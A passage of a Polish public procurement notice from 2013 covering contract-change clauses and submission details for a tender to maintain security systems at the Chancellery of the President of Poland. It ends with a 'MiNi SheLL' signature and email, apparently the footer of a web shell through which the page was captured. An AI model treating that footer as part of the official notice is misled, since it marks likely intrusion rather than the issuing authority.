a) Zamawiający dopuszcza możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, w sytuacji gdy dotyczy ona zmiany stawki podatku (VAT) na usługi będące przedmiotem zamówienia - w przypadku ustawowej zmiany podatku VAT. Wówczas wynagrodzenie umowne brutto ulegnie modyfikacji proporcjonalnie do tej zmiany;
b) konieczność przedłużenia (zmiany) terminu umownego z powodu zmian spowodowanych warunkami atmosferycznymi, w szczególności klęskami żywiołowymi, warunkami atmosferycznymi uniemożliwiającymi prowadzenie usług, przeprowadzenie prób i sprawdzeń. Strony z powodów, jakie mogą wpływać na zmiany terminów wykonania usług, wyłączają niezgodności związane z pogodą, typową dla okresu wykonywania usług;
c) okoliczności leżących po stronie Zamawiającego w szczególności wstrzymanie robót przez Zamawiającego;
2. O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien poinformować Zamawiającego pisemnie i natychmiast odnotować to w stosownym protokole wpisem potwierdzonym przez Przedstawiciela Zamawiającego.
3. W przypadku wystąpienia którejkolwiek okoliczności wymienionej w ust. 1b) termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonania jej przedmiotu w sposób należyty, nie dłużej jednak jak o okres trwania tych okoliczności. Ciężar udowodnienia faktu w takim układzie spoczywa na Wykonawcy przedmiotowego zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kancelaria Prezydenta RP ul. Wiejska 10, 00-902 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2013 godzina 11:00, miejsce: Kancelaria Prezydenta RP ul. Wiejska 10, 00-902 Warszawa - Kancelaria Główna, wejście D.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Druki do postępowania dostępne są na stronie internetowej Zamawiającego.

Wykonawcy zainteresowani udziałem w postępowaniu składają w siedzibie Zamawiającego wniosek o dopuszczenie do udziału w postępowaniu wraz z dokumentami, o których mowa w sekcji III.3) - III.7) w nieprzejrzystym, zamkniętym opakowaniu zaadresowanym na adres Zamawiającego z dopiskiem wniosek o dopuszczenie do udziału w postępowaniu na konserwację systemów techniki ochronnej w Kancelarii Prezydenta RP [znak sprawy 14/2013]- nie otwierać przed dniem 20 maja 2013 r. godz. 11.00.

Na kopercie należy podać dane Wykonawcy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com